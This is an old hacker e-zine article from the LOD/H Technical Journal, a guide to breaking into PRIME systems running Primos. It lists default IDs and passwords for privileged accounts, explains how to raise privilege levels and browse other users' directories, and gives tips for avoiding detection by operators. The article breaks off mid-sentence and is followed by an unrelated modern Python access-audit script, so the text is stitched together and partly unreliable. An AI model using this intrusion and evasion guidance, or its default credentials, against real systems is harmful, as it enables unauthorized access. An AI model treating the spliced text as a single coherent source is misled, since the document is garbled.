Basic Telephone Switching Systems - by David Talley, Hayden publishers
No. 1 AMARC - Bell System Technical Journal
Mark Tabas for information about CAMA and DP, The Marauder, and Doom Prophet.
===============================================================================

The LOD/H Technical Journal: File #4 of 10

Written by Carrier Culprit and The Legion Of Hackers

This is Part I of a II part series on the PRIME operating system. In this article I will give a general overview of the system and command usage.

Note: This article will center around Primos version 19, revisions 19.1 and up.

[Background Information]

Primos is the operating system for the PRIME mainframe and supermini systems. The operating system is usually run on the Prime 750. Primos is a relatively secure system. External security is great, but the internal security needs help. The latest revision of version 19 is 19.4.0 (as of this writing). This revision is more secure in both external and internal security than its predecessors. By the time this article is released, Version 20 should be out and an article on that version will be forthcoming.

[Logging in V18.x.x]

It is quite easy to hack into a Prime running version 18 of Primos. The external security is rather poor. All you need is an ID to logon. There is no password prompt, thus getting an operator's account is rather easy. Occasionally, there will be some additional security software running and passwords will be needed. I am not going to go into detail on version 18 because it is obsolete; for any questions regarding version 18, please leave me mail.
[Logging in V19.x.x]

A Primos system is very easy to recognize. Once you are connected, hit a few returns to get the "ER!" prompt, or you may be prompted with the ID prompt. If you do get prompted with the ID prompt, you need not put "Login" in front of the ID. Here is an example of a Primos login:

ATDT 123-4567
[2 RETURNS]
ER!
Login CARRIER
Password:
Prime (user 31) Logged in Friday, 5-Sept 14:27:20
Welcome to Primos Version 19.4.5
Last login Thursday, Sept 4 1986 02:01:12
(1 mail waiting)

Note: You usually get 1 try to login before being disconnected. In some cases the 2 c/r's are not needed, and some systems won't respond until you type "login" and a return. Passwords and ID's are 6 characters; they may consist of letters and numbers. Finding passwords on a Primos can be hard, but there are some common ID's and passwords. You must use "login" before entering your ID. In this case my ID is "CARRIER". Here is a common list of ID's and passwords I have come across:

===============================
| ID name      | Password     |
===============================
| PRIME        | PRIME        |
| *SYSTEM      | SYSTEM       |
| PRIMOS       | PRIMOS       |
| *ADMIN       | ADMIN        |
| RJE          | RJE          |
| DEMO         | DEMO         |
| GAMES        | GAMES        |
| GUEST        | GUEST        |
| REGIST       | REGIST       |
| TEST         | TEST         |
| NETMAN       | NETMAN       |
| PRIRUN       | PRIRUN       |
| TOOLS        | TOOLS        |
| CMDNC0       | CMDMNC0      |
| +TELENET     | TELENET      |
===============================

Note: * means that that ID is most likely to have SYS1 priorities.
Note: + account belongs to Telenet or some employees of Telenet, in which case the Primos will be located on the Telenet packet network.

System Accounts:

SYSTEM - This account usually contains configuration programs. It also contains system messages, logs, and userlists.
TOOLS  - This account usually contains the utility to add users and the Netlink utility (explained later).
CMDNC0 - Contains help files.

These are default accounts which are standard in new Primos systems. They should be there unless the userfile has been modified by the system operator.
You can also mix them around, ie-

Login SYSTEM
Password: PRIME

There is no "systat" or extensive on-line help before logging in. Don't you wish people would model their operating systems after TOPS-10 (chuckle)? The best account to get on under would be an account with SYS1 priorities. This account is for people who advise regular users.

Ok, let's assume you have hacked onto a regular account, something like GAMES. The command prompt for Primos is "OK,". The first thing we would want to do is to see who is logged in. We would type "Users" and would get something like this:

OK, Users
Users=8

This is telling us that there are 8 users currently logged in, which isn't extremely helpful. To get a full listing of usernames we would type "Status Users" or "Status -Users". We would get a status of users currently on-line. It would show us usernames, devices, and other sub-categories. Here's a sample of what you would get:

User       Number   Device
ADMIN      3        <MFD0>
SYSTEM     1        <MFD0> <MFD1>
OBB        31       <MFD0>
CRIMINAL   12       <MFD1>

If you see that other people are logged in, it may be best to log off and call back later, as the operators can perform the same command, and if they know that user should not be on the system at that time, you will obviously be kicked off. If there are 2 devices specified, the user is either receiving output from a different device, sending input to that device, or has logged out incorrectly (tsk tsk).

To get a full status of memory and accounting, you would type "Status System". This is usually a menu driven program, and you will get different options, ie- log of users, memory, devices, etc.

We can access different priority levels by using the "CHAP" command. This is also the way we can find out what our priority level is. We would do:

OK, CHAP UP
OK, CHAP DOWN X   (or simply CHAP DOWN)

To return to your original priority level:

OK, CHAP ORIGIN   (or CHAP DEFAULT)

Usually a user may leave his priority level rather low. You can then try to raise your level.
There should be 6 different priority levels, 0 meaning lowest and 6 meaning highest. Here is a little diagram that will give you a list of ID's and what most of them will have access to. Note: Some may have access to more or less than what I have written, but the comments are accurate for most systems.

!=================================================!
!   ID   ! Comments                               !
!=================================================!
! GAMES  ! Allows user to view low level          !
!        ! directories, and execute regular       !
!        ! commands. ie-CHAP, STATUS              !
!=================================================!
! DEMO   ! Allows user to run games, and          !
!        ! execute the tour program. Most         !
!        ! commands will not work, and it         !
!        ! has a time limit. Lastly, it can       !
!        ! only access low level directories.     !
!=================================================!
! PRIME  ! Allows user to execute all             !
!        ! commands, except operator cmds.        !
!        ! User can also access PRIMENET if       !
!        ! the system supports it. Access         !
!        ! to only low level directories.         !
!=================================================!
! ADMIN  ! Access to view all directories &       !
!        ! bypass all ACLs. Can set up            !
!        ! accounts on other Primos systems       !
!        ! via PRIMENET (if available).           !
!        ! User can execute any command.          !
!=================================================!
! SYSTEM ! Same as ADMIN, except cannot           !
!        ! view feedback to ADMINS.               !
!=================================================!
! RJE    ! Same as GAMES, except an RJE           !
!        ! user can erase user log and spy.       !
!=================================================!
! TEST   ! Able to access any directory;          !
!        ! the only restriction is a test user    !
!        ! is not authorized to shut down         !
!        ! the system.                            !
!=================================================!

Note: RJE is Remote Job Entry.

Priority levels may vary on different Primos systems; they can range from 0 to any number up to 10. The most common range is 0-6. On some Primos systems you can do a CHAP PRIORITY to see what the range is.
Ok, we have checked priorities and the system status. Let's move to directories. To list a directory, type "LD", short for List Directory. This will list the directory you are attached to; in this case it will be your home directory. You will get a list of files within your own directory. To view someone else's directory you would type AT nameofdirectory. Let's say we are logged into a DEMO account and we would like to view the files in the GAMES account. We could do either of the following:

OK, AT GAMES

This is telling the system we would like to default to the GAMES directory. This is similar to the Set Default name on a VAX/VMS system. (See Lex Luthor's Hacking VAX/VMS 3 part series for more information on VMS.) Or we could do:

OK, FUTIL
>AT GAMES

This is the same thing, except that in the first method you can still execute Primos commands while attached to the GAMES account, but when using FUTIL (File UTILity program) you can only list, create and copy files. To get out of the file utility program just hit a Control-P.

Here is a chart of file types and how to execute them:

-------------------------------------------
| File type     | How to execute it       |
===========================================
| .CPL          | CPL pathname            |
| .SAVE         | SAVE pathname           |
| .SEG          | SEG pathname            |
| .BASICV       | BASICV pathname         |
| .TXT          | SLIST pathname          |
| .COM          | CO pathname             |
-------------------------------------------

Note: SLIST will also show the program lines of the file, whether it is a CPL file or a COM file. This is a good way to learn CPL (Command Procedure Language). Most files will not have suffixes. To execute them type "Resume pathname"; filenames are called pathnames on PRIMOS. Unlike VMS, the PRIMOS system doesn't have the type of file as a suffix. On some files you'll get the suffix, but if not, try "Resume pathname" and that should execute the file, especially files with an "*" preceding them. If a file is in the format "*filename", do "Resume *filename".
Usually basic files have an * preceding their titles. To create a directory type:

OK, Create directname [-password] [-access]

A password can be from 1-6 letters. If I wanted to have a password on my directory I would do:

OK, Create directname [-limp] [-access]

If you don't put in an access level, the directory will automatically be set to ALL access. Here's a list of access rights:

P    = Protect a directory
D    = Delete entries from directory
A    = Add entries to directory
L    = Read the contents within directory
U    = Attach to a directory
R    = Read contents of a file
W    = Edit contents of a file
ALL  = All of the above
NONE = Denies all access

Typically, if you are logged into a DEMO account your directory will be set to ALL access. If it is, someone can attach to the demo directory and do anything they want with it. Here is a list of accounts and what access they will usually have on their directory:

DEMO   = ALL
GAMES  = LUR
PRIME  = ALL
SYSTEM = LUR
ADMIN  = NONE
TEST   = LUR
JBB    = NONE
RJE    = LUR

Most directories have LUR access, which is access to read the contents of the directory, attach to the directory, and read the contents of a file. If you have enough privileges (priority levels) you can do the following to change the access rights:

OK, Set_Access ALL [-LUR]

This is setting the access from ALL to LUR. ALL was the present access; now we have changed it to LUR. You should only do this if it's your own personal account, as changing access rights on hacked accounts could lead to your detection and subsequent expulsion from the system.

To create a file, preferably a text file, type "Mail pathname"; you will then be thrown into the Mail subsystem, which I believe is version 3.1 now. You can type in all the info you want; when finished, hit a Control-P. It will ask you for a pathname to save it to. Enter the name you would like. It will look something like this:

OK, Mail DOE
Mail 3.1
>Hello. This is your system operator.
>Any ideas on how to keep those
>pesky little computer criminals out of our system?
>Comments can be directed to SYSTEM.
Enter Filename: Pesky.Txt

The above method is rather primitive but works well if you are only creating a text file. It is a common method used on version 18, and is easy to perform. The other method is more common on version 19, and is commonly used today.

OK, Create Test.Txt
OK, Ed
EDIT
$

Note: $ is not dropping you into DCL, so you DCL programmers are out of luck (chuckle). From the $ prompt you can type 'help' to get a list of commands which can be used in the Editor.

$ (return)

By hitting return we are given the "&" prompt; here we can input our file, or if you know CPL you can start programming. Do not hit return on a blank line or you will be thrown into the main Editor prompt ('
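The directory access rights listed earlier (P, D, A, L, U, R, W, plus ALL and NONE) and the account/access list that follows them can be checked mechanically. The Python below is an added example written for this edition, not code from the article or from Prime; it assumes the letter meanings as given above and treats P, D, A and W as the rights that let another user alter a directory, which is this example's assumption rather than a Primos rule.

```python
# Added example (not from the article or from Prime): audit Primos-style
# directory access strings for directories that other users could modify.
# Assumption: the letters mean what the list above says, and P, D, A and W
# are the rights that let another user alter a directory or its files.

ACCESS_LETTERS = {
    "P": "protect a directory", "D": "delete entries from directory",
    "A": "add entries to directory", "L": "read the contents within directory",
    "U": "attach to a directory", "R": "read contents of a file",
    "W": "edit contents of a file",
}
MODIFY_RIGHTS = {"P", "D", "A", "W"}  # rights that change something

# Constructed sample: the account/access list given above.
SAMPLE = {
    "DEMO": "ALL", "GAMES": "LUR", "PRIME": "ALL", "SYSTEM": "LUR",
    "ADMIN": "NONE", "TEST": "LUR", "JBB": "NONE", "RJE": "LUR",
}


def expand(spec):
    """ALL, NONE or letters such as LUR -> set of letters; rejects unknown ones."""
    spec = spec.strip().upper()
    if spec == "ALL":
        return set(ACCESS_LETTERS)
    if spec == "NONE":
        return set()
    unknown = set(spec) - set(ACCESS_LETTERS)
    if unknown:
        raise ValueError("unknown access letter(s): " + "".join(sorted(unknown)))
    return set(spec)


def audit(directories):
    """{name: access string} -> {name: sorted modify rights} for writable ones."""
    findings = {}
    for name, spec in directories.items():
        granted = expand(spec) & MODIFY_RIGHTS
        if granted:
            findings[name] = sorted(granted)
    return findings


if __name__ == "__main__":
    # Report every directory in the sample that others could change.
    for name, rights in audit(SAMPLE).items():
        print(name, "grants:", ", ".join(ACCESS_LETTERS[c] for c in rights))
```

On the sample list only DEMO and PRIME are flagged, matching the article's warning that an ALL-access DEMO directory lets anyone attach to it and do as they please.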